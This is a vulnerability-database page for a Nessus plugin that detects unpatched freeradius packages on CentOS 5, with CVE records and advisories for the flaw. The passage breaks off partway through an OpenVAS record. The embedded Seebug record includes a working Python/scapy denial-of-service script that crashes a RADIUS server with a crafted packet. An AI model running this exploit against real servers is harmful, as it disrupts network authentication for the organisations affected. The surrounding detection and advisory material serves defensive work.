Search...

CentOS 5 : freeradius (CESA-2009:1451)

2010-01-06T00:00:00

ID CENTOS_RHSA-2009-1451.NASL
Type nessus
Reporter This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2010-01-06T00:00:00

Description

Updated freeradius packages that fix a security issue are now available for Red Hat Enterprise Linux 5.

This update has been rated as having moderate security impact by the Red Hat Security Response Team.

FreeRADIUS is a high-performance and highly configurable free Remote Authentication Dial In User Service (RADIUS) server, designed to allow centralized authentication and authorization for a network.

An input validation flaw was discovered in the way FreeRADIUS decoded specific RADIUS attributes from RADIUS packets. A remote attacker could use this flaw to crash the RADIUS daemon (radiusd) via a specially crafted RADIUS packet. (CVE-2009-3111)

Users of FreeRADIUS are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, radiusd will be restarted automatically.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Red Hat Security Advisory RHSA-2009:1451 and 
# CentOS Errata and Security Advisory 2009:1451 respectively.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(43791);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  script_cve_id("CVE-2003-0967", "CVE-2009-3111");
  script_xref(name:"RHSA", value:"2009:1451");

  script_name(english:"CentOS 5 : freeradius (CESA-2009:1451)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote CentOS host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Updated freeradius packages that fix a security issue are now
available for Red Hat Enterprise Linux 5.

This update has been rated as having moderate security impact by the
Red Hat Security Response Team.

FreeRADIUS is a high-performance and highly configurable free Remote
Authentication Dial In User Service (RADIUS) server, designed to allow
centralized authentication and authorization for a network.

An input validation flaw was discovered in the way FreeRADIUS decoded
specific RADIUS attributes from RADIUS packets. A remote attacker
could use this flaw to crash the RADIUS daemon (radiusd) via a
specially crafted RADIUS packet. (CVE-2009-3111)

Users of FreeRADIUS are advised to upgrade to these updated packages,
which contain a backported patch to correct this issue. After
installing the update, radiusd will be restarted automatically."
  );
  # https://lists.centos.org/pipermail/centos-announce/2009-October/016228.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?1fd2b45c"
  );
  # https://lists.centos.org/pipermail/centos-announce/2009-October/016229.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?d79b04e7"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected freeradius packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius-mysql");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius-postgresql");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:freeradius-unixODBC");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:5");

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/12/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/10/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/06");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CentOS Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/CentOS/release");
if (isnull(release) || "CentOS" &gt;!&lt; release) audit(AUDIT_OS_NOT, "CentOS");
os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
os_ver = os_ver[1];
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 5.x", "CentOS " + os_ver);

if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);


flag = 0;
if (rpm_check(release:"CentOS-5", reference:"freeradius-1.1.3-1.5.el5_4")) flag++;
if (rpm_check(release:"CentOS-5", reference:"freeradius-mysql-1.1.3-1.5.el5_4")) flag++;
if (rpm_check(release:"CentOS-5", reference:"freeradius-postgresql-1.1.3-1.5.el5_4")) flag++;
if (rpm_check(release:"CentOS-5", reference:"freeradius-unixODBC-1.1.3-1.5.el5_4")) flag++;


if (flag)
{
  security_report_v4(
    port       : 0,
    severity   : SECURITY_WARNING,
    extra      : rpm_report_get()
  );
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "freeradius / freeradius-mysql / freeradius-postgresql / etc");
}

JSON Vulners Source

Initial Source

{"id": "CENTOS_RHSA-2009-1451.NASL", "bulletinFamily": "scanner", "title": "CentOS 5 : freeradius (CESA-2009:1451)", "description": "Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.", "published": "2010-01-06T00:00:00", "modified": "2010-01-06T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/43791", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1fd2b45c", "http://www.nessus.org/u?d79b04e7"], "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "type": "nessus", "lastseen": "2021-01-06T09:25:55", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0967", "CVE-2009-3111"]}, {"type": "seebug", "idList": ["SSV:14525"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22450", "SECURITYVULNS:VULN:10230"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310880824", "OPENVAS:830798", "OPENVAS:66614", "OPENVAS:1361412562310830798", "OPENVAS:66166", "OPENVAS:136141256231064905", "OPENVAS:136141256231066166", "OPENVAS:64905", "OPENVAS:880824", "OPENVAS:136141256231066614"]}, {"type": "nessus", "idList": ["SL_20090917_FREERADIUS_ON_SL5_X.NASL", "UBUNTU_USN-832-1.NASL", "SUSE_FREERADIUS-6528.NASL", "MANDRIVA_MDVSA-2009-227.NASL", "SUSE_FREERADIUS-6499.NASL", "SUSE9_12507.NASL", "ORACLELINUX_ELSA-2009-1451.NASL", "REDHAT-RHSA-2003-386.NASL", "REDHAT-RHSA-2009-1451.NASL", "SUSE_FREERADIUS-6496.NASL"]}, {"type": "redhat", "idList": ["RHSA-2003:386", "RHSA-2009:1451"]}, {"type": "exploitdb", "idList": ["EDB-ID:9642", "EDB-ID:23391"]}, {"type": "osvdb", "idList": ["OSVDB:2850"]}, {"type": "ubuntu", "idList": ["USN-832-1"]}, {"type": "centos", "idList": ["CESA-2009:1451"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:81198"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1451"]}, {"type": "freebsd", "idList": ["1B3F854B-E4BD-11DE-B276-000D8787E1BE"]}, {"type": "zdt", "idList": ["1337DAY-ID-7004"]}], "modified": "2021-01-06T09:25:55", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-01-06T09:25:55", "rev": 2}, "vulnersScore": 5.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# CentOS Errata and Security Advisory 2009:1451 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43791);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"CentOS 5 : freeradius (CESA-2009:1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1fd2b45c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d79b04e7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n}\n", "naslFamily": "CentOS Local Security Checks", "pluginID": "43791", "cpe": ["p-cpe:/a:centos:centos:freeradius-unixODBC", "p-cpe:/a:centos:centos:freeradius-mysql", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:freeradius-postgresql", "p-cpe:/a:centos:centos:freeradius"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:21:07", "description": "rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute with a tag, which causes memcpy to be called with a -1 length argument, as demonstrated using the Tunnel-Password attribute.", "edition": 5, "cvss3": {}, "published": "2003-12-15T05:00:00", "title": "CVE-2003-0967", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0967"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:freeradius:freeradius:0.9.2"], "id": "CVE-2003-0967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0967", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:freeradius:freeradius:0.9.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.", "edition": 5, "cvss3": {}, "published": "2009-09-09T18:30:00", "title": "CVE-2009-3111", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3111"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:freeradius:freeradius:1.1.6", "cpe:/a:freeradius:freeradius:0.8", "cpe:/a:freeradius:freeradius:0.8.1", "cpe:/a:freeradius:freeradius:1.0.4", "cpe:/a:freeradius:freeradius:0.2", "cpe:/a:freeradius:freeradius:1.0.5", "cpe:/a:freeradius:freeradius:0.9", "cpe:/a:freeradius:freeradius:1.1.0", "cpe:/a:freeradius:freeradius:1.1.5", "cpe:/a:freeradius:freeradius:1.0.3", "cpe:/a:freeradius:freeradius:1.0.2", "cpe:/a:freeradius:freeradius:1.0.0", "cpe:/a:freeradius:freeradius:0.5", "cpe:/a:freeradius:freeradius:1.0.1", "cpe:/a:freeradius:freeradius:1.1.7", "cpe:/a:freeradius:freeradius:0.4", "cpe:/a:freeradius:freeradius:0.9.3", "cpe:/a:freeradius:freeradius:0.9.2", "cpe:/a:freeradius:freeradius:0.3", "cpe:/a:freeradius:freeradius:0.9.1", "cpe:/a:freeradius:freeradius:1.1.3"], "id": "CVE-2009-3111", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:freeradius:freeradius:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freeradius:freeradius:0.8:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:36:47", "description": "No description provided by source.", "published": "2009-09-11T00:00:00", "title": "FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14525", "id": "SSV:14525", "sourceData": "\n #!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint "Usage: radius_killer.py <radiushost>\\n"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator="\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99",id=180)/ \\\r\n\tRadiusAttr(type=69,value="",len=2)\r\n\r\nsend(PoD)\r\n\r\n# sebug.net\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-14525"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:226\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : freeradius\r\n Date : September 10, 2009\r\n Affected: Corporate 4.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been found and corrected in freeradius:\r\n \r\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\r\n attackers to cause a denial of service (radiusd crash) via zero-length\r\n Tunnel-Password attributes. NOTE: this is a regression error related\r\n to CVE-2003-0967 (CVE-2009-3111).\r\n \r\n This update provides a solution to this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Corporate 4.0:\r\n 37f0dc23fdd28466d7a94db9ad445e36 corporate/4.0/i586/freeradius-1.0.4-2.5.20060mlcs4.i586.rpm\r\n e9f0aeb620f6c18f7abe8cd030ee5b45 corporate/4.0/i586/libfreeradius1-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 5efc89f68a9ae3323f4d08db2db99c76 \r\ncorporate/4.0/i586/libfreeradius1-devel-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 7cfebad483805297740a24c630d959c4 \r\ncorporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.5.20060mlcs4.i586.rpm\r\n e9cfff1376db58a3dec1499bdada7d07 \r\ncorporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 97d0dd301a51c5402d4fdedd113a4162 \r\ncorporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 617dbfffff6ea9191afb7f9573e65883 \r\ncorporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.5.20060mlcs4.i586.rpm\r\n 3a75efd86b69a5bb0ac240d1e7c2ae75 \r\ncorporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.5.20060mlcs4.i586.rpm \r\n a89677d75dc960fd619954eb53b4d749 corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n b4ac8ca1b8e9bca59c7f1a2b21386e65 corporate/4.0/x86_64/freeradius-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 018ee9ffa0b73a5f5cf2b183f83deb5d \r\ncorporate/4.0/x86_64/lib64freeradius1-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 24f796932b9ffe79093351912a1c40e7 \r\ncorporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n adc0cba3f5d762c43c494aed2c2e4924 \r\ncorporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n c21d434b39fca57615932c5e4c895459 \r\ncorporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n b52370d5e13cb0e9534050e5f7e8a5a7 \r\ncorporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n 8bdcfbb1740d3967b5ef909f14af32c9 \r\ncorporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.5.20060mlcs4.x86_64.rpm\r\n d376a3b411ecd4ed71c2289b2da536ae \r\ncorporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.5.20060mlcs4.x86_64.rpm \r\n a89677d75dc960fd619954eb53b4d749 corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFKqMYdmqjQ0CJFipgRAmWZAKDiWc30oc8TUdCK9qT5+svPaMOPzQCgm73G\r\ndGxi5xjHNGGtXkz/9cowb9A=\r\n=0yka\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-09-10T00:00:00", "published": "2009-09-10T00:00:00", "id": "SECURITYVULNS:DOC:22450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22450", "title": "[ MDVSA-2009:226 ] freeradius", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3111"], "description": "Crash on zero-length Tunnel-Password attribute.", "edition": 1, "modified": "2009-09-10T00:00:00", "published": "2009-09-10T00:00:00", "id": "SECURITYVULNS:VULN:10230", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10230", "title": "FreeRADIUS RADIUS server DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-04-06T11:40:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "id": "OPENVAS:136141256231066614", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066614", "type": "openvas", "title": "FreeBSD Ports: freeradius", "sourceData": "#\n#VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: freeradius\n\nCVE-2009-3111\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66614\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-3111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: freeradius\");\n\n script_xref(name:\"URL\", value:\"http://freeradius.org/security.html\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9642\");\n 